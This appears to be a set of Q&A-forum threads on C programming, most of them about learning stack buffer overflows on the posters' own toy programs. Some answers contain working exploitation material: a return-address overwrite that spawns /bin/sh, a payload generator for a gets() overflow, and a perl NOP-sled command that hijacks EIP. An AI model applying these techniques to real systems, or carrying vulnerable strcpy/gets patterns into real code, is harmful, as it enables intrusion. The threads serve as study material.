I was working with an example from K&R; it's a cat utility to view files:
#include <stdio.h>

main(int argc, char **argv)
{
    FILE *fp;
    void filecopy(FILE *, FILE *);

    if (argc == 1)
        filecopy(stdin, stdout);
    else                            // accidentally mistyped
        while (--argv > 0)          // should have been --argc > 0
            if ((fp = fopen(*++argv, "r")) == NULL) {
                printf("cat: can't open %s\n", *argv);
                return 1;
            } else {
                filecopy(fp, stdout);
                fclose(fp);
            }
    return 0;
}

void filecopy(FILE *ifp, FILE *ofp)
{
    int c;

    while ((c = getc(ifp)) != EOF)
        putc(c, ofp);
}
I compiled it with gcc cat.c,
and when I ran ./a.out cat.c from the terminal, all I got was some Chinese-looking symbols and some readable text (names like _fini_array_, _GLOBAL_OFFSET_TABLE_, and so on), and the garbage just kept going until I pressed Ctrl+C. I wanted to ask why I didn't get a segmentation fault: wasn't the program reading every memory location starting from argv's address, and shouldn't I lack the rights to do that?
Let's look at these two consecutive lines:
while(--argv > 0)
if((fp=fopen(*++argv,"r"))==NULL){
Every time you decrement argv, you end up incrementing it on the next line. So overall, you are just decrementing and incrementing argv a lot but you are never actually reading past the bounds of the argv memory area.
Even if you were reading past the bounds of the argv memory area, that would be undefined behavior, and you are not guaranteed to get a segmentation fault. The result you get depends on your compiler, your operating system, and the other things in your program.
I suspect that executing --argv also gives you undefined behavior, because after that line is executed, the pointer would probably point outside of the array allocated for argv data. But, since you didn't dereference argv while it was pointing there, it turned out to be OK.
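For comparison, here is a sketch of the loop with the intended condition, counting down argc instead of moving the argv pointer in the test (this is how the K&R version reads; filecopy is unchanged from your program):
#include <stdio.h>

void filecopy(FILE *, FILE *);   /* same filecopy as in the question */

int main(int argc, char **argv)
{
    FILE *fp;

    if (argc == 1)
        filecopy(stdin, stdout);
    else
        while (--argc > 0)                            /* count down the number of arguments... */
            if ((fp = fopen(*++argv, "r")) == NULL) { /* ...while stepping argv to the next name */
                printf("cat: can't open %s\n", *argv);
                return 1;
            } else {
                filecopy(fp, stdout);
                fclose(fp);
            }
    return 0;
}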
I'm starting to tinker with buffer overflows, and wrote the following program:
#include <unistd.h>
void g() {
execve("/bin/sh", NULL, NULL);
}
void f() {
long *return_address;
char instructions[] = "\xb8\x01\x00\x00\x00\xcd\x80"; // exit(1)
return_address = (long*) (&return_address + 2);
*return_address = (long)&g; // or (long)instructions
}
int main() {
f();
}
It does what I expect it to do: the write through return_address overwrites the return address of f with the address of g, which opens a shell. However, if I instead set the return address to instructions, I get a segmentation fault, and none of the instructions in instructions is executed.
I compile with GCC, using -fno-stack-protector.
How can I prevent this segmentation fault from occurring?
At least one problem isn't related to the buffer overflow.
execve("/bin/sh", NULL, NULL);
That first NULL becomes the argv of the process you're starting. argv must be an array of strings that is terminated with a NULL. So a segfault may happen when /bin/sh starts up, tries to read argv[0], and dereferences NULL.
void g(void) {
char *argv[] = { "/bin/sh", NULL };
execve(argv[0], argv, NULL);
}
You might also add -z execstack to the gcc command line, which will tell the linker to permit an executable stack. You should also verify that the instructions you have there are what exit(1) compiles to on your system if you got them from a tutorial somewhere.
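For reference, a sketch of how those bytes decode on 32-bit x86 Linux (worth confirming with a disassembler on your own system):
/* "\xb8\x01\x00\x00\x00"  =>  mov eax, 1   ; 1 is the exit system call number
   "\xcd\x80"              =>  int 0x80     ; trap into the kernel
   The exit status comes from ebx, which these bytes never set, so this is
   "exit with whatever happens to be in ebx" rather than exit(1). */
char instructions[] = "\xb8\x01\x00\x00\x00\xcd\x80";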
First, I'm using these compilation flags:
gcc -fno-stack-protector -z execstack -m32
OK, let's look at the code below:
#include <stdio.h>
#include <string.h>

int main(int argc, char *argv[]){
    char pass[8];
    char logged = 'n';

    strcpy(pass, argv[1]);

    if (logged == 'y') {
        printf("Hello \n");
    } else {
        printf("Run hacker :(\n");
    }
    return 0;
}
And the second version:
#include <stdio.h>
#include <string.h>

int main(int argc, char *argv[]){
    char logged = 'n';
    char pass[8];

    strcpy(pass, argv[1]);

    if (logged == 'y') {
        printf("Hello \n");
    } else {
        printf("Run hacker :(\n");
    }
    return 0;
}
Both programs are vulnerable to a stack overflow attack (passing 'yyyyyyyyy' as the argument passes the test).
But why? The order of the local variables in the second program is different from that in the first, so the order in which they are laid out on the stack should be different too, shouldn't it?
First, a stack overflow vulnerability is not exactly the same thing as stack corruption.
This code writes to an automatic variable that is allocated on the stack (in your frame). The compiler reserved 8 bytes on the stack for the pass string. If you write more than 8 bytes, you corrupt whatever else is on the stack right next to the pass[] array. It doesn't really matter what that is; it will be corrupted, and that is what stack corruption means.
With some skill, one can craft an input string in argv[1] (really an instruction byte stream) that lines up with the saved return address of main and thus forces execution of code of the attacker's choosing. That is what the vulnerability is.
You seem to understand that the order of variables on your stack only determines what gets corrupted and how. You should see exactly what you expected if you turn off stack protection with -fno-stack-protector, give or take the exact stack layout imposed by your compiler. With the protection on, both cases should abort with the stack-smashing backtrace and diagnostics.
Note that different Linux distributions set the stack-protector default to different values, but as long as you control it explicitly on the command line you are all set.
The -z execstack option controls whether code on the stack may be executed; it is irrelevant here, since your input only corrupts the stack.
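If you want to see the layout your compiler actually chose in the two versions, a minimal probe like this (an illustrative sketch, not part of the exploit) prints where the two locals ended up; whether logged is reachable from an overflow of pass depends entirely on that placement:
#include <stdio.h>

/* Minimal layout probe: prints the addresses the compiler picked for the
   two locals. Ordering and padding are compiler- and flag-dependent. */
int main(void)
{
    char pass[8];
    char logged = 'n';

    printf("pass   starts at %p\n", (void *)pass);
    printf("logged lives at  %p\n", (void *)&logged);
    /* If &logged sits just past pass + 8, overflowing pass can overwrite it. */
    return 0;
}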
I'm trying to call the oopsIGotToTheBadFunction by changing the return address via the user input in goodFunctionUserInput.
Here is the code:
#include <stdio.h>
#include <stdlib.h>
int oopsIGotToTheBadFunction(void)
{
printf("Gotcha!\n");
exit(0);
}
int goodFunctionUserInput(void)
{
char buf[12];
gets(buf);
return(1);
}
int main(void)
{
goodFunctionUserInput();
printf("Overflow failed\n");
return(1);
}
/**
> gcc isThisGood.c
> a.out
hello
Overflow failed
*/
I've tried loading the buffer with 0123456789012345, but I'm not sure what to put after that to reach the address. The address is 0x1000008fc.
Any insights or comments would be helpful.
I'm going to give this the benefit of the doubt and presume this is an exercise intended to learn about the stack (perhaps homework) and not learning how to do anything malicious.
Consider where the return address of goodFunctionUserInput is on the stack and what would happen if you changed it. You may wish to check the disassembly to see how much space the compiler made on the stack for goodFunctionUserInput and where exactly buf is. When you figure out how long a string to enter, consider the endianness of the machine and what that means for the address you want to write over the return address of goodFunctionUserInput. Worrying about what sort of awful things this does to the stack isn't important here, since the function you want to call simply calls exit.
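Purely as an illustration (the 24-byte distance from buf to the saved return address is a hypothetical value that has to be read off your own disassembly, and this assumes a little-endian machine), a payload could be generated along these lines and piped into the vulnerable binary:
#include <stdio.h>
#include <stdint.h>
#include <string.h>

int main(void)
{
    uint64_t target = 0x1000008fcULL;   /* address of oopsIGotToTheBadFunction */
    unsigned char payload[24 + sizeof target];

    memset(payload, 'A', 24);                      /* filler: buf plus saved frame data (guessed offset) */
    memcpy(payload + 24, &target, sizeof target);  /* address bytes in little-endian order */
    fwrite(payload, 1, sizeof payload, stdout);    /* e.g.  ./payload | ./a.out */
    return 0;
}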
I have installed the Linux distro named DVL (Damn Vulnerable Linux), and I'm practicing buffer overflow exploits.
I wrote two virtually identical programs which are vulnerable to bof:
//bof_n.c
#include <stdio.h>
#include <string.h>

void bof() {
    printf("BOF");
}

void foo(char* argv) {
    char buf[10];
    strcpy(buf, argv);
    printf("foo");
}

int main(int argc, char* argv[]) {
    if (argc > 1) {   // argv[1] must exist
        foo(argv[1]);
    }
    return 0;
}
and
//bof.c
#include <stdio.h>
#include <string.h>

void bof() {
    printf("BOF!\n"); //this is the only change
}

void foo(char* argv) {
    char buf[10];
    strcpy(buf, argv);
    printf("foo");
}

int main(int argc, char* argv[]) {
    if (argc > 1) {   // argv[1] must exist
        foo(argv[1]);
    }
    return 0;
}
After that I compiled both of them and obtained the bof() function address in both cases (e.g., objdump -d bof.o | grep bof). Let's call this address ADDR; it is 4 bytes long.
I also found that if I write 32 bytes into the buf variable, the EIP register is completely overwritten (I cannot copy the gdb output here since it is in a virtual machine).
Now, if I do:
./bof `perl -e 'print "\x90"x28 . "ADDR"'`
I get:
fooBOF!
Segmentation fault
If instead I try the same approach with bof_n, I only get the "Segmentation fault" message.
So I tried increasing the number of times the ADDR value is repeated, and found that if it is repeated at least 350 times, I get the wanted result. But instead of exactly the output above, I get a long list of "BOF" messages, one after the other. I tried to obtain just a single "BOF" message, but apparently I cannot (I get either zero or a long list of them).
Why is this happening? Any ideas?
I'm using DVL with gcc 3.4.6
What's your goal?
You should really be using a debugger for this; try gdb. With it you can see the memory, registers, stack, and disassembly of what is currently going on in the process.
I'd guess that in the first function the string, being only 3 characters long, gets optimized into the inline bytes \x42\x4f\x46\x00, so the disassembly may be slightly different.
The C source is pretty much irrelevant; you'll need to either disassemble or fuzz both binaries to find the appropriate size for each NOP sled.
I found the solution. The issue was with the printing of the message, not with the buffer overflow exploit itself.
In fact the eip register was correctly overwritten in the bof_n example too, and the program flow was correctly redirected into the bof() function. The problem was that, apparently, stdout was not flushed before the segmentation fault, and hence no message was shown.
Using fprintf(stderr, "BOF"); instead, I finally get the "BOF" message.
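For the record, a sketch that keeps the message on stdout but forces the buffer out before the crash (stderr worked because it is unbuffered by default):
#include <stdio.h>

void bof(void)
{
    printf("BOF");
    fflush(stdout);   /* push the buffered bytes out before the segfault kills the process */
}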
Recently I came across the problem of getting 'Oops, Spwan error, can not allocate memory' while working with a C application.
To understand file descriptor and memory management better, I tried the following sample program, and it gave me a surprising result.
Here is the code:
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

int main(int ac, char *av[]);

int main(int ac, char *av[])
{
    FILE *fd = NULL;            /* fopen() returns a FILE*, not an int */
    unsigned long counter = 0;

    while (1)
    {
        char *aa = malloc(16384);               /* intentionally leaked */
        usleep(5);
        fprintf(stderr, "Counter is %lu \n", counter++);
        fd = fopen("/dev/null", "r");           /* intentionally never closed */
    }
    return 0;
}
In this sample program I am trying to allocate memory every 5 microseconds and also open a file descriptor at the same time.
Now when I run the program, memory usage starts increasing and the file descriptor count also goes up, but memory usage tops out at about 82.5% and the file descriptor count stops at 1024. I know 'ulimit' sets this parameter and it is 1024 by default.
But I expected this program to crash by eating up the memory, or to give an error like 'Can't spawn child'; instead it keeps running.
So I just wanted to know why it is not crashing, and why it does not report an error even though it has reached the file descriptor limit.
It's probably not crashing because when malloc() finds no more memory to allocate, it simply returns NULL. Likewise, once the descriptor limit is reached, fopen() just returns NULL (the underlying open() returns a negative value). In other words, your OS and the standard library cooperate to report failures instead of letting your program crash.
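A sketch of the same loop with the failure paths checked explicitly (the exact errno values you see, typically ENOMEM and EMFILE, depend on your system):
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

int main(void)
{
    unsigned long counter = 0;

    while (1)
    {
        char *aa = malloc(16384);            /* still leaked on purpose */
        FILE *fp = fopen("/dev/null", "r");  /* still never closed */

        if (aa == NULL)
            perror("malloc");                /* reported as an error, not a crash */
        if (fp == NULL)
            perror("fopen");                 /* typically EMFILE once the fd limit is hit */

        usleep(5);
        fprintf(stderr, "Counter is %lu\n", counter++);
    }
    return 0;
}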
What's the point in doing that?
Plus, on Linux, the system won't even really use up the memory if nothing is actually written to aa.
And anyway, if you could actually consume all the memory (which will never happen on Linux and *BSD; I don't know about Windows), it would just make the system lag badly or even freeze, rather than simply crashing your application.